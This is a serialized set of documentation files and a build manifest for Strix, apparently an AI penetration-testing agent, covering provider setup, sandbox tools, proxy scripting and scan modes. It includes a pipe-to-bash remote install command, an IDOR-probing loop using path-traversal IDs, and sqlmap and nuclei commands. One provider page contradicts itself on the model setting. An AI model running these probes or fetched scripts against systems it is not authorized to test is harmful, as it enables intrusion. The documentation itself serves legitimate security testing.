Strix security scans on every pull request\"\n---\n\nIntegrate Strix into your GitHub workflow to catch vulnerabilities before they reach production.\n\n## Basic Workflow\n\n```yaml .github/workflows/security.yml\nname: Security Scan\n\non:\n pull_request:\n\njobs:\n strix-scan:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@v4\n\n - name: Install Strix\n run: curl -sSL https://strix.ai/install | bash\n\n - name: Run Security Scan\n env:\n STRIX_LLM: ${{ secrets.STRIX_LLM }}\n LLM_API_KEY: ${{ secrets.LLM_API_KEY }}\n run: strix -n -t ./ --scan-mode quick\n```\n\n## Required Secrets\n\nAdd these secrets to your repository:\n\n| Secret | Description |\n|--------|-------------|\n| `STRIX_LLM` | Model name (e.g., `openai/gpt-5`) |\n| `LLM_API_KEY` | API key for your LLM provider |\n\n## Exit Codes\n\nThe workflow fails when vulnerabilities are found:\n\n| Code | Result |\n|------|--------|\n| 0 | Pass β€” No vulnerabilities |\n| 2 | Fail β€” Vulnerabilities found |\n\n## Scan Modes for CI\n\n| Mode | Duration | Use Case |\n|------|----------|----------|\n| `quick` | Minutes | Every PR |\n| `standard` | ~30 min | Nightly builds |\n| `deep` | 1-4 hours | Release candidates |\n\n\nUse `quick` mode for PRs to keep feedback fast. Schedule `deep` scans nightly.\n\n" }, { "path": "docs/llm-providers/anthropic.mdx", "content": "---\ntitle: \"Anthropic\"\ndescription: \"Configure Strix with Claude models\"\n---\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"sk-ant-...\"\n```\n\n## Available Models\n\n| Model | Description |\n|-------|-------------|\n| `anthropic/claude-sonnet-4-6` | Best balance of intelligence and speed |\n| `anthropic/claude-opus-4-6` | Maximum capability for deep analysis |\n\n## Get API Key\n\n1. Go to [console.anthropic.com](https://console.anthropic.com)\n2. Navigate to API Keys\n3. Create a new key\n" }, { "path": "docs/llm-providers/azure.mdx", "content": "---\ntitle: \"Azure OpenAI\"\ndescription: \"Configure Strix with OpenAI models via Azure\"\n---\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"azure/your-gpt5-deployment\"\nexport AZURE_API_KEY=\"your-azure-api-key\"\nexport AZURE_API_BASE=\"https://your-resource.openai.azure.com\"\nexport AZURE_API_VERSION=\"2025-11-01-preview\"\n```\n\n## Configuration\n\n| Variable | Description |\n|----------|-------------|\n| `STRIX_LLM` | `azure/` |\n| `AZURE_API_KEY` | Your Azure OpenAI API key |\n| `AZURE_API_BASE` | Your Azure OpenAI endpoint URL |\n| `AZURE_API_VERSION` | API version (e.g., `2025-11-01-preview`) |\n\n## Example\n\n```bash\nexport STRIX_LLM=\"azure/gpt-5-deployment\"\nexport AZURE_API_KEY=\"abc123...\"\nexport AZURE_API_BASE=\"https://mycompany.openai.azure.com\"\nexport AZURE_API_VERSION=\"2025-11-01-preview\"\n```\n\n## Prerequisites\n\n1. Create an Azure OpenAI resource\n2. Deploy a model (e.g., GPT-5)\n3. Get the endpoint URL and API key from the Azure portal\n" }, { "path": "docs/llm-providers/bedrock.mdx", "content": "---\ntitle: \"AWS Bedrock\"\ndescription: \"Configure Strix with models via AWS Bedrock\"\n---\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"bedrock/anthropic.claude-4-5-sonnet-20251022-v1:0\"\n```\n\nNo API key requiredβ€”uses AWS credentials from environment.\n\n## Authentication\n\n### Option 1: AWS CLI Profile\n\n```bash\nexport AWS_PROFILE=\"your-profile\"\nexport AWS_REGION=\"us-east-1\"\n```\n\n### Option 2: Access Keys\n\n```bash\nexport AWS_ACCESS_KEY_ID=\"AKIA...\"\nexport AWS_SECRET_ACCESS_KEY=\"...\"\nexport AWS_REGION=\"us-east-1\"\n```\n\n### Option 3: IAM Role (EC2/ECS)\n\nAutomatically uses instance role credentials.\n\n## Available Models\n\n| Model | Description |\n|-------|-------------|\n| `bedrock/anthropic.claude-4-5-sonnet-20251022-v1:0` | Claude 4.5 Sonnet |\n| `bedrock/anthropic.claude-4-5-opus-20251022-v1:0` | Claude 4.5 Opus |\n| `bedrock/anthropic.claude-4-5-haiku-20251022-v1:0` | Claude 4.5 Haiku |\n| `bedrock/amazon.titan-text-premier-v2:0` | Amazon Titan Premier v2 |\n\n## Prerequisites\n\n1. Enable model access in the AWS Bedrock console\n2. Ensure your IAM role/user has `bedrock:InvokeModel` permission\n" }, { "path": "docs/llm-providers/local.mdx", "content": "---\ntitle: \"Local Models\"\ndescription: \"Run Strix with self-hosted LLMs for privacy and air-gapped testing\"\n---\n\nRunning Strix with local models allows for completely offline, privacy-first security assessments. Data never leaves your machine, making this ideal for sensitive internal networks or air-gapped environments.\n\n## Privacy vs Performance\n\n| Feature | Local Models | Cloud Models (GPT-5/Claude 4.5) |\n|---------|--------------|--------------------------------|\n| **Privacy** | πŸ”’ Data stays local | Data sent to provider |\n| **Cost** | Free (hardware only) | Pay-per-token |\n| **Reasoning** | Lower (struggles with agents) | State-of-the-art |\n| **Setup** | Complex (GPU required) | Instant |\n\n\n**Compatibility Note**: Strix relies on advanced agentic capabilities (tool use, multi-step planning, self-correction). Most local models, especially those under 70B parameters, struggle with these complex tasks.\n\nFor critical assessments, we strongly recommend using state-of-the-art cloud models like **Claude 4.5 Sonnet** or **GPT-5**. Use local models only when privacy is the absolute priority.\n\n\n## Ollama\n\n[Ollama](https://ollama.ai) is the easiest way to run local models on macOS, Linux, and Windows.\n\n### Setup\n\n1. Install Ollama from [ollama.ai](https://ollama.ai)\n2. Pull a high-performance model:\n ```bash\n ollama pull qwen3-vl\n ```\n3. Configure Strix:\n ```bash\n export STRIX_LLM=\"ollama/qwen3-vl\"\n export LLM_API_BASE=\"http://localhost:11434\"\n ```\n\n### Recommended Models\n\nWe recommend these models for the best balance of reasoning and tool use:\n\n**Recommended models:**\n- **Qwen3 VL** (`ollama pull qwen3-vl`)\n- **DeepSeek V3.1** (`ollama pull deepseek-v3.1`)\n- **Devstral 2** (`ollama pull devstral-2`)\n\n## LM Studio / OpenAI Compatible\n\nIf you use LM Studio, vLLM, or other runners:\n\n```bash\nexport STRIX_LLM=\"openai/local-model\"\nexport LLM_API_BASE=\"http://localhost:1234/v1\" # Adjust port as needed\n```\n" }, { "path": "docs/llm-providers/models.mdx", "content": "---\ntitle: \"Strix Router\"\ndescription: \"Access top LLMs through a single API with high rate limits and zero data retention\"\n---\n\nStrix Router gives you access to the best LLMs through a single API key.\n\n\nStrix Router is currently in **beta**. It's completely optional β€” Strix works with any [LiteLLM-compatible provider](/llm-providers/overview) using your own API keys, or with [local models](/llm-providers/local). Strix Router is just the setup we test and optimize for.\n\n\n## Why Use Strix Router?\n\n- **High rate limits** β€” No throttling during long-running scans\n- **Zero data retention** β€” Routes to providers with zero data retention policies enabled\n- **Failover & load balancing** β€” Automatic fallback across providers for reliability\n- **Simple setup** β€” One API key, one environment variable, no provider accounts needed\n- **No markup** β€” Same token pricing as the underlying providers, no extra fees\n\n## Quick Start\n\n1. Get your API key at [models.strix.ai](https://models.strix.ai)\n2. Set your environment:\n\n```bash\nexport LLM_API_KEY='your-strix-api-key'\nexport STRIX_LLM='strix/gpt-5'\n```\n\n3. Run a scan:\n\n```bash\nstrix --target ./your-app\n```\n\n## Available Models\n\n### Anthropic\n\n| Model | ID |\n|-------|-----|\n| Claude Sonnet 4.6 | `strix/claude-sonnet-4.6` |\n| Claude Opus 4.6 | `strix/claude-opus-4.6` |\n\n### OpenAI\n\n| Model | ID |\n|-------|-----|\n| GPT-5.2 | `strix/gpt-5.2` |\n| GPT-5.1 | `strix/gpt-5.1` |\n| GPT-5 | `strix/gpt-5` |\n\n### Google\n\n| Model | ID |\n|-------|-----|\n| Gemini 3 Pro | `strix/gemini-3-pro-preview` |\n| Gemini 3 Flash | `strix/gemini-3-flash-preview` |\n\n### Other\n\n| Model | ID |\n|-------|-----|\n| GLM-5 | `strix/glm-5` |\n| GLM-4.7 | `strix/glm-4.7` |\n\n## Configuration Reference\n\n\n Your Strix API key from [models.strix.ai](https://models.strix.ai).\n\n\n\n Model ID from the tables above. Must be prefixed with `strix/`.\n\n" }, { "path": "docs/llm-providers/openai.mdx", "content": "---\ntitle: \"OpenAI\"\ndescription: \"Configure Strix with OpenAI models\"\n---\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"sk-...\"\n```\n\n## Available Models\n\nSee [OpenAI Models Documentation](https://platform.openai.com/docs/models) for the full list of available models.\n\n## Get API Key\n\n1. Go to [platform.openai.com](https://platform.openai.com)\n2. Navigate to API Keys\n3. Create a new secret key\n\n## Custom Base URL\n\nFor OpenAI-compatible APIs:\n\n```bash\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"your-key\"\nexport LLM_API_BASE=\"https://your-proxy.com/v1\"\n```\n" }, { "path": "docs/llm-providers/openrouter.mdx", "content": "---\ntitle: \"OpenRouter\"\ndescription: \"Configure Strix with models via OpenRouter\"\n---\n\n[OpenRouter](https://openrouter.ai) provides access to 100+ models from multiple providers through a single API.\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"openrouter/openai/gpt-5\"\nexport LLM_API_KEY=\"sk-or-...\"\n```\n\n## Available Models\n\nAccess any model on OpenRouter using the format `openrouter//`:\n\n| Model | Configuration |\n|-------|---------------|\n| GPT-5 | `openrouter/openai/gpt-5` |\n| Claude Sonnet 4.6 | `openrouter/anthropic/claude-sonnet-4.6` |\n| Gemini 3 Pro | `openrouter/google/gemini-3-pro-preview` |\n| GLM-4.7 | `openrouter/z-ai/glm-4.7` |\n\n## Get API Key\n\n1. Go to [openrouter.ai](https://openrouter.ai)\n2. Sign in and navigate to Keys\n3. Create a new API key\n\n## Benefits\n\n- **Single API** β€” Access models from OpenAI, Anthropic, Google, Meta, and more\n- **Fallback routing** β€” Automatic failover between providers\n- **Cost tracking** β€” Monitor usage across all models\n- **Higher rate limits** β€” OpenRouter handles provider limits for you\n" }, { "path": "docs/llm-providers/overview.mdx", "content": "---\ntitle: \"Overview\"\ndescription: \"Configure your AI model for Strix\"\n---\n\nStrix uses [LiteLLM](https://docs.litellm.ai/docs/providers) for model compatibility, supporting 100+ LLM providers.\n\n## Strix Router (Recommended)\n\nThe fastest way to get started. [Strix Router](/llm-providers/models) gives you access to tested models with the highest rate limits and zero data retention.\n\n```bash\nexport STRIX_LLM=\"strix/gpt-5\"\nexport LLM_API_KEY=\"your-strix-api-key\"\n```\n\nGet your API key at [models.strix.ai](https://models.strix.ai).\n\n## Bring Your Own Key\n\nYou can also use any LiteLLM-compatible provider with your own API keys:\n\n| Model | Provider | Configuration |\n| ----------------- | ------------- | -------------------------------- |\n| GPT-5 | OpenAI | `openai/gpt-5` |\n| Claude Sonnet 4.6 | Anthropic | `anthropic/claude-sonnet-4-6` |\n| Gemini 3 Pro | Google Vertex | `vertex_ai/gemini-3-pro-preview` |\n\n```bash\nexport STRIX_LLM=\"openai/gpt-5\"\nexport LLM_API_KEY=\"your-api-key\"\n```\n\n## Local Models\n\nRun models locally with [Ollama](https://ollama.com), [LM Studio](https://lmstudio.ai), or any OpenAI-compatible server:\n\n```bash\nexport STRIX_LLM=\"ollama/llama4\"\nexport LLM_API_BASE=\"http://localhost:11434\"\n```\n\nSee the [Local Models guide](/llm-providers/local) for setup instructions and recommended models.\n\n## Provider Guides\n\n\n \n Recommended models router with high rate limits.\n \n \n GPT-5 models.\n \n \n Claude Opus, Sonnet, and Haiku.\n \n \n Access 100+ models through a single API.\n \n \n Gemini 3 models via Google Cloud.\n \n \n Claude and Titan models via AWS.\n \n \n GPT-5 via Azure.\n \n \n Llama 4, Mistral, and self-hosted models.\n \n\n\n## Model Format\n\nUse LiteLLM's `provider/model-name` format:\n\n```\nopenai/gpt-5\nanthropic/claude-sonnet-4-6\nvertex_ai/gemini-3-pro-preview\nbedrock/anthropic.claude-4-5-sonnet-20251022-v1:0\nollama/llama4\n```\n" }, { "path": "docs/llm-providers/vertex.mdx", "content": "---\ntitle: \"Google Vertex AI\"\ndescription: \"Configure Strix with Gemini models via Google Cloud\"\n---\n\n## Installation\n\nVertex AI requires the Google Cloud dependency. Install Strix with the vertex extra:\n\n```bash\npipx install \"strix-agent[vertex]\"\n```\n\n## Setup\n\n```bash\nexport STRIX_LLM=\"vertex_ai/gemini-3-pro-preview\"\n```\n\nNo API key requiredβ€”uses Google Cloud Application Default Credentials.\n\n## Authentication\n\n### Option 1: gcloud CLI\n\n```bash\ngcloud auth application-default login\n```\n\n### Option 2: Service Account\n\n```bash\nexport GOOGLE_APPLICATION_CREDENTIALS=\"/path/to/service-account.json\"\n```\n\n## Available Models\n\n| Model | Description |\n|-------|-------------|\n| `vertex_ai/gemini-3-pro-preview` | Best overall performance for security testing |\n| `vertex_ai/gemini-3-flash-preview` | Faster and cheaper |\n\n## Project Configuration\n\n```bash\nexport VERTEXAI_PROJECT=\"your-project-id\"\nexport VERTEXAI_LOCATION=\"global\"\n```\n\n## Prerequisites\n\n1. Enable the Vertex AI API in your Google Cloud project\n2. Ensure your account has the `Vertex AI User` role\n" }, { "path": "docs/quickstart.mdx", "content": "---\ntitle: \"Quick Start\"\ndescription: \"Install Strix and run your first security scan\"\n---\n\n## Prerequisites\n\n- Docker (running)\n- An LLM API key β€” use [Strix Router](/llm-providers/models) for the easiest setup, or bring your own key from any [supported provider](/llm-providers/overview)\n\n## Installation\n\n\n \n ```bash\n curl -sSL https://strix.ai/install | bash\n ```\n \n \n ```bash\n pipx install strix-agent\n ```\n \n\n\n## Configuration\n\nSet your LLM provider:\n\n\n \n ```bash\n export STRIX_LLM=\"strix/gpt-5\"\n export LLM_API_KEY=\"your-strix-api-key\"\n ```\n \n \n ```bash\n export STRIX_LLM=\"openai/gpt-5\"\n export LLM_API_KEY=\"your-api-key\"\n ```\n \n\n\n\nFor best results, use `strix/gpt-5`, `strix/claude-opus-4.6`, or `strix/gpt-5.2`.\n\n\n## Run Your First Scan\n\n```bash\nstrix --target ./your-app\n```\n\n\nFirst run pulls the Docker sandbox image automatically. Results are saved to `strix_runs/`.\n\n\n## Target Types\n\nStrix accepts multiple target types:\n\n```bash\n# Local codebase\nstrix --target ./app-directory\n\n# GitHub repository\nstrix --target https://github.com/org/repo\n\n# Live web application\nstrix --target https://your-app.com\n\n# Multiple targets (white-box testing)\nstrix -t https://github.com/org/repo -t https://your-app.com\n```\n\n## Next Steps\n\n\n \n Explore all command-line options.\n \n \n Choose the right scan depth.\n \n\n" }, { "path": "docs/tools/browser.mdx", "content": "---\ntitle: \"Browser\"\ndescription: \"Playwright-powered Chrome for web application testing\"\n---\n\nStrix uses a headless Chrome browser via Playwright to interact with web applications exactly like a real user would.\n\n## How It Works\n\nAll browser traffic is automatically routed through the Caido proxy, giving Strix full visibility into every request and response. This enables:\n\n- Testing client-side vulnerabilities (XSS, DOM manipulation)\n- Navigating authenticated flows (login, OAuth, MFA)\n- Triggering JavaScript-heavy functionality\n- Capturing dynamically generated requests\n\n## Capabilities\n\n| Action | Description |\n| ---------- | ------------------------------------------- |\n| Navigate | Go to URLs, follow links, handle redirects |\n| Click | Interact with buttons, links, form elements |\n| Type | Fill in forms, search boxes, input fields |\n| Execute JS | Run custom JavaScript in the page context |\n| Screenshot | Capture visual state for reports |\n| Multi-tab | Test across multiple browser tabs |\n\n## Example Flow\n\n1. Agent launches browser and navigates to login page\n2. Fills in credentials and submits form\n3. Proxy captures the authentication request\n4. Agent navigates to protected areas\n5. Tests for IDOR by replaying requests with modified IDs\n" }, { "path": "docs/tools/overview.mdx", "content": "---\ntitle: \"Agent Tools\"\ndescription: \"How Strix agents interact with targets\"\n---\n\nStrix agents use specialized tools to test your applications like a real penetration tester would.\n\n## Core Tools\n\n\n \n Playwright-powered Chrome for interacting with web UIs.\n \n \n Caido-powered proxy for intercepting and replaying requests.\n \n \n Bash shell for running commands and security tools.\n \n \n Pre-installed security tools: Nuclei, ffuf, and more.\n \n\n\n## Additional Tools\n\n| Tool | Purpose |\n| -------------- | ---------------------------------------- |\n| Python Runtime | Write and execute custom exploit scripts |\n| File Editor | Read and modify source code |\n| Web Search | Real-time OSINT via Perplexity |\n| Notes | Document findings during the scan |\n| Reporting | Generate vulnerability reports with PoCs |\n" }, { "path": "docs/tools/proxy.mdx", "content": "---\ntitle: \"HTTP Proxy\"\ndescription: \"Caido-powered proxy for request interception and replay\"\n---\n\nStrix includes [Caido](https://caido.io), a modern HTTP proxy built for security testing. All browser traffic flows through Caido, giving the agent full control over requests and responses.\n\n## Capabilities\n\n| Feature | Description |\n| ---------------- | -------------------------------------------- |\n| Request Capture | Log all HTTP/HTTPS traffic automatically |\n| Request Replay | Repeat any request with modifications |\n| HTTPQL | Query captured traffic with powerful filters |\n| Scope Management | Focus on specific domains or paths |\n| Sitemap | Visualize the discovered attack surface |\n\n## HTTPQL Filtering\n\nQuery captured requests using Caido's HTTPQL syntax\n\n## Request Replay\n\nThe agent can take any captured request and replay it with modifications:\n\n- Change path parameters (test for IDOR)\n- Modify request body (test for injection)\n- Add/remove headers (test for auth bypass)\n- Alter cookies (test for session issues)\n\n## Python Integration\n\nAll proxy functions are automatically available in Python sessions. This enables powerful scripted security testing:\n\n```python\n# List recent POST requests\npost_requests = list_requests(\n httpql_filter='req.method.eq:\"POST\"',\n page_size=20\n)\n\n# View a specific request\nrequest_details = view_request(\"req_123\", part=\"request\")\n\n# Replay with modified payload\nresponse = repeat_request(\"req_123\", {\n \"body\": '{\"user_id\": \"admin\"}'\n})\nprint(f\"Status: {response['status_code']}\")\n```\n\n### Available Functions\n\n| Function | Description |\n| ---------------------- | ------------------------------------------ |\n| `list_requests()` | Query captured traffic with HTTPQL filters |\n| `view_request()` | Get full request/response details |\n| `repeat_request()` | Replay a request with modifications |\n| `send_request()` | Send a new HTTP request |\n| `scope_rules()` | Manage proxy scope (allowlist/denylist) |\n| `list_sitemap()` | View discovered endpoints |\n| `view_sitemap_entry()` | Get details for a sitemap entry |\n\n### Example: Automated IDOR Testing\n\n```python\n# Get all requests to user endpoints\nuser_requests = list_requests(\n httpql_filter='req.path.cont:\"/users/\"'\n)\n\nfor req in user_requests.get('requests', []):\n # Try accessing with different user IDs\n for test_id in ['1', '2', 'admin', '../admin']:\n response = repeat_request(req['id'], {\n 'url': req['path'].replace('/users/1', f'/users/{test_id}')\n })\n\n if response['status_code'] == 200:\n print(f\"Potential IDOR: {test_id} returned 200\")\n```\n\n## Human-in-the-Loop\n\nStrix exposes the Caido proxy to your host machine, so you can interact with it alongside the automated scan. When the sandbox starts, the Caido URL is displayed in the TUI sidebar β€” click it to copy, then open it in Caido Desktop.\n\n### Accessing Caido\n\n1. Start a scan as usual\n2. Look for the **Caido** URL in the sidebar stats panel (e.g. `localhost:52341`)\n3. Open the URL in Caido Desktop\n4. Click **Continue as guest** to access the instance\n\n### What You Can Do\n\n- **Inspect traffic** β€” Browse all HTTP/HTTPS requests the agent is making in real time\n- **Replay requests** β€” Take any captured request and resend it with your own modifications\n- **Intercept and modify** β€” Pause requests mid-flight, edit them, then forward\n- **Explore the sitemap** β€” See the full attack surface the agent has discovered\n- **Manual testing** β€” Use Caido's tools to test findings the agent reports, or explore areas it hasn't reached\n\nThis turns Strix from a fully automated scanner into a collaborative tool β€” the agent handles the heavy lifting while you focus on the interesting parts.\n\n## Scope\n\nCreate scopes to filter traffic to relevant domains:\n\n```\nAllowlist: [\"api.example.com\", \"*.example.com\"]\nDenylist: [\"*.gif\", \"*.jpg\", \"*.png\", \"*.css\", \"*.js\"]\n```\n" }, { "path": "docs/tools/sandbox.mdx", "content": "---\ntitle: \"Sandbox Tools\"\ndescription: \"Pre-installed security tools in the Strix container\"\n---\n\nStrix runs inside a Kali Linux-based Docker container with a comprehensive set of security tools pre-installed. The agent can use any of these tools through the [terminal](/tools/terminal).\n\n## Reconnaissance\n\n| Tool | Description |\n| ---------------------------------------------------------- | -------------------------------------- |\n| [Subfinder](https://github.com/projectdiscovery/subfinder) | Subdomain discovery |\n| [Naabu](https://github.com/projectdiscovery/naabu) | Fast port scanner |\n| [httpx](https://github.com/projectdiscovery/httpx) | HTTP probing and analysis |\n| [Katana](https://github.com/projectdiscovery/katana) | Web crawling and spidering |\n| [ffuf](https://github.com/ffuf/ffuf) | Fast web fuzzer |\n| [Nmap](https://nmap.org) | Network scanning and service detection |\n\n## Web Testing\n\n| Tool | Description |\n| ------------------------------------------------------ | -------------------------------- |\n| [Arjun](https://github.com/s0md3v/Arjun) | HTTP parameter discovery |\n| [Dirsearch](https://github.com/maurosoria/dirsearch) | Directory and file brute-forcing |\n| [wafw00f](https://github.com/EnableSecurity/wafw00f) | WAF fingerprinting |\n| [GoSpider](https://github.com/jaeles-project/gospider) | Web spider for link extraction |\n\n## Automated Scanners\n\n| Tool | Description |\n| ---------------------------------------------------- | -------------------------------------------------- |\n| [Nuclei](https://github.com/projectdiscovery/nuclei) | Template-based vulnerability scanner |\n| [SQLMap](https://sqlmap.org) | Automatic SQL injection detection and exploitation |\n| [Wapiti](https://wapiti-scanner.github.io) | Web application vulnerability scanner |\n| [ZAP](https://zaproxy.org) | OWASP Zed Attack Proxy |\n\n## JavaScript Analysis\n\n| Tool | Description |\n| -------------------------------------------------------- | ------------------------------ |\n| [JS-Snooper](https://github.com/aravind0x7/JS-Snooper) | JavaScript reconnaissance |\n| [jsniper](https://github.com/xchopath/jsniper.sh) | JavaScript file analysis |\n| [Retire.js](https://retirejs.github.io/retire.js) | Detect vulnerable JS libraries |\n| [ESLint](https://eslint.org) | JavaScript static analysis |\n| [js-beautify](https://github.com/beautifier/js-beautify) | JavaScript deobfuscation |\n| [JSHint](https://jshint.com) | JavaScript code quality tool |\n\n## Secret Detection\n\n| Tool | Description |\n| ----------------------------------------------------------- | ------------------------------------- |\n| [TruffleHog](https://github.com/trufflesecurity/trufflehog) | Find secrets in code and history |\n| [Semgrep](https://github.com/semgrep/semgrep) | Static analysis for security patterns |\n| [Bandit](https://bandit.readthedocs.io) | Python security linter |\n\n## Authentication Testing\n\n| Tool | Description |\n| ------------------------------------------------------------ | ---------------------------------- |\n| [jwt_tool](https://github.com/ticarpi/jwt_tool) | JWT token testing and exploitation |\n| [Interactsh](https://github.com/projectdiscovery/interactsh) | Out-of-band interaction detection |\n\n## Container & Supply Chain\n\n| Tool | Description |\n| -------------------------- | ---------------------------------------------- |\n| [Trivy](https://trivy.dev) | Container and dependency vulnerability scanner |\n\n## HTTP Proxy\n\n| Tool | Description |\n| ------------------------- | --------------------------------------------- |\n| [Caido](https://caido.io) | Modern HTTP proxy for interception and replay |\n\n## Browser\n\n| Tool | Description |\n| ------------------------------------ | --------------------------- |\n| [Playwright](https://playwright.dev) | Headless browser automation |\n\n\n All tools are pre-configured and ready to use. The agent selects the appropriate tool based on the vulnerability being tested.\n\n" }, { "path": "docs/tools/terminal.mdx", "content": "---\ntitle: \"Terminal\"\ndescription: \"Bash shell for running commands and security tools\"\n---\n\nStrix has access to a persistent bash terminal running inside the Docker sandbox. This gives the agent access to all [pre-installed security tools](/tools/sandbox).\n\n## Capabilities\n\n| Feature | Description |\n| ----------------- | ---------------------------------------------------------- |\n| Persistent state | Working directory and environment persist between commands |\n| Multiple sessions | Run parallel terminals for concurrent operations |\n| Background jobs | Start long-running processes without blocking |\n| Interactive | Respond to prompts and control running processes |\n\n## Common Uses\n\n### Running Security Tools\n\n```bash\n# Subdomain enumeration\nsubfinder -d example.com\n\n# Vulnerability scanning\nnuclei -u https://example.com\n\n# SQL injection testing\nsqlmap -u \"https://example.com/page?id=1\"\n```\n\n### Code Analysis\n\n```bash\n# Search for secrets\ntrufflehog filesystem ./\n\n# Static analysis\nsemgrep --config auto ./src\n\n# Grep for patterns\ngrep -r \"password\" ./\n```\n\n### Custom Scripts\n\n```bash\n# Run Python exploits\npython3 exploit.py\n\n# Execute shell scripts\n./test_auth_bypass.sh\n```\n\n## Session Management\n\nThe agent can run multiple terminal sessions concurrently, for example:\n\n- Main session for primary testing\n- Secondary session for monitoring\n- Background processes for servers or watchers\n" }, { "path": "docs/usage/cli.mdx", "content": "---\ntitle: \"CLI Reference\"\ndescription: \"Command-line options for Strix\"\n---\n\n## Basic Usage\n\n```bash\nstrix --target [options]\n```\n\n## Options\n\n\n Target to test. Accepts URLs, repositories, local directories, domains, or IP addresses. Can be specified multiple times.\n\n\n\n Custom instructions for the scan. Use for credentials, focus areas, or specific testing approaches.\n\n\n\n Path to a file containing detailed instructions.\n\n\n\n Scan depth: `quick`, `standard`, or `deep`.\n\n\n\n Run in headless mode without TUI. Ideal for CI/CD.\n\n\n\n Path to a custom config file (JSON) to use instead of `~/.strix/cli-config.json`.\n\n\n## Examples\n\n```bash\n# Basic scan\nstrix --target https://example.com\n\n# Authenticated testing\nstrix --target https://app.com --instruction \"Use credentials: user:pass\"\n\n# Focused testing\nstrix --target api.example.com --instruction \"Focus on IDOR and auth bypass\"\n\n# CI/CD mode\nstrix -n --target ./ --scan-mode quick\n\n# Multi-target white-box testing\nstrix -t https://github.com/org/app -t https://staging.example.com\n```\n\n## Exit Codes\n\n| Code | Meaning |\n|------|---------|\n| 0 | Scan completed, no vulnerabilities found |\n| 2 | Vulnerabilities found (headless mode only) |\n" }, { "path": "docs/usage/instructions.mdx", "content": "---\ntitle: \"Custom Instructions\"\ndescription: \"Guide Strix with custom testing instructions\"\n---\n\nUse instructions to provide context, credentials, or focus areas for your scan.\n\n## Inline Instructions\n\n```bash\nstrix --target https://app.com --instruction \"Focus on authentication vulnerabilities\"\n```\n\n## File-Based Instructions\n\nFor complex instructions, use a file:\n\n```bash\nstrix --target https://app.com --instruction-file ./pentest-instructions.md\n```\n\n## Common Use Cases\n\n### Authenticated Testing\n\n```bash\nstrix --target https://app.com \\\n --instruction \"Login with email: test@example.com, password: TestPass123\"\n```\n\n### Focused Scope\n\n```bash\nstrix --target https://api.example.com \\\n --instruction \"Focus on IDOR vulnerabilities in the /api/users endpoints\"\n```\n\n### Exclusions\n\n```bash\nstrix --target https://app.com \\\n --instruction \"Do not test /admin or /internal endpoints\"\n```\n\n### API Testing\n\n```bash\nstrix --target https://api.example.com \\\n --instruction \"Use API key header: X-API-Key: abc123. Focus on rate limiting bypass.\"\n```\n\n## Instruction File Example\n\n```markdown instructions.md\n# Penetration Test Instructions\n\n## Credentials\n- Admin: admin@example.com / AdminPass123\n- User: user@example.com / UserPass123\n\n## Focus Areas\n1. IDOR in user profile endpoints\n2. Privilege escalation between roles\n3. JWT token manipulation\n\n## Out of Scope\n- /health endpoints\n- Third-party integrations\n```\n\n\nBe specific. Good instructions help Strix prioritize the most valuable attack paths.\n\n" }, { "path": "docs/usage/scan-modes.mdx", "content": "---\ntitle: \"Scan Modes\"\ndescription: \"Choose the right scan depth for your use case\"\n---\n\nStrix offers three scan modes to balance speed and thoroughness.\n\n## Quick\n\n```bash\nstrix --target ./app --scan-mode quick\n```\n\nFast checks for obvious vulnerabilities. Best for:\n- CI/CD pipelines\n- Pull request validation\n- Rapid smoke tests\n\n**Duration**: Minutes\n\n## Standard\n\n```bash\nstrix --target ./app --scan-mode standard\n```\n\nBalanced testing for routine security reviews. Best for:\n- Regular security assessments\n- Pre-release validation\n- Development milestones\n\n**Duration**: 30 minutes to 1 hour\n\n## Deep\n\n```bash\nstrix --target ./app --scan-mode deep\n```\n\nThorough penetration testing. Best for:\n- Comprehensive security audits\n- Pre-production reviews\n- Critical application assessments\n\n**Duration**: 1-4 hours depending on target complexity\n\n\nDeep mode is the default. It explores edge cases, chained vulnerabilities, and complex attack paths.\n\n\n## Choosing a Mode\n\n| Scenario | Recommended Mode |\n|----------|------------------|\n| Every PR | Quick |\n| Weekly scans | Standard |\n| Before major release | Deep |\n| Bug bounty hunting | Deep |\n" }, { "path": "pyproject.toml", "content": "[tool.poetry]\nname = \"strix-agent\"\nversion = \"0.8.2\"\ndescription = \"Open-source AI Hackers for your apps\"\nauthors = [\"Strix \"]\nreadme = \"README.md\"\nlicense = \"Apache-2.0\"\nkeywords = [\n \"cybersecurity\",\n \"security\",\n \"vulnerability\",\n \"scanner\",\n \"pentest\",\n \"agent\",\n \"ai\",\n \"cli\",\n]\nclassifiers = [\n \"Development Status :: 3 - Alpha\",\n \"Intended Audience :: Information Technology\",\n \"Intended Audience :: System Administrators\",\n \"Topic :: Security\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Environment :: Console\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: 3.12\",\n \"Programming Language :: Python :: 3.13\",\n \"Programming Language :: Python :: 3.14\",\n]\npackages = [\n { include = \"strix\", format = [\"sdist\", \"wheel\"] }\n]\ninclude = [\n \"LICENSE\",\n \"README.md\",\n \"strix/agents/**/*.jinja\",\n \"strix/skills/**/*.md\",\n \"strix/**/*.xml\",\n \"strix/**/*.tcss\"\n]\n\n[tool.poetry.scripts]\nstrix = \"strix.interface.main:main\"\n\n[tool.poetry.dependencies]\npython = \"^3.12\"\n# Core CLI dependencies\nlitellm = { version = \"~1.81.1\", extras = [\"proxy\"] }\ntenacity = \"^9.0.0\"\npydantic = {extras = [\"email\"], version = \"^2.11.3\"}\nrich = \"*\"\ndocker = \"^7.1.0\"\ntextual = \"^4.0.0\"\nxmltodict = \"^0.13.0\"\nrequests = \"^2.32.0\"\ncvss = \"^3.2\"\ntraceloop-sdk = \"^0.53.0\"\nopentelemetry-exporter-otlp-proto-http = \"^1.40.0\"\nscrubadub = \"^2.0.1\"\n\n# Optional LLM provider dependencies\ngoogle-cloud-aiplatform = { version = \">=1.38\", optional = true }\n\n# Sandbox-only dependencies (only needed inside Docker container)\nfastapi = { version = \"*\", optional = true }\nuvicorn = { version = 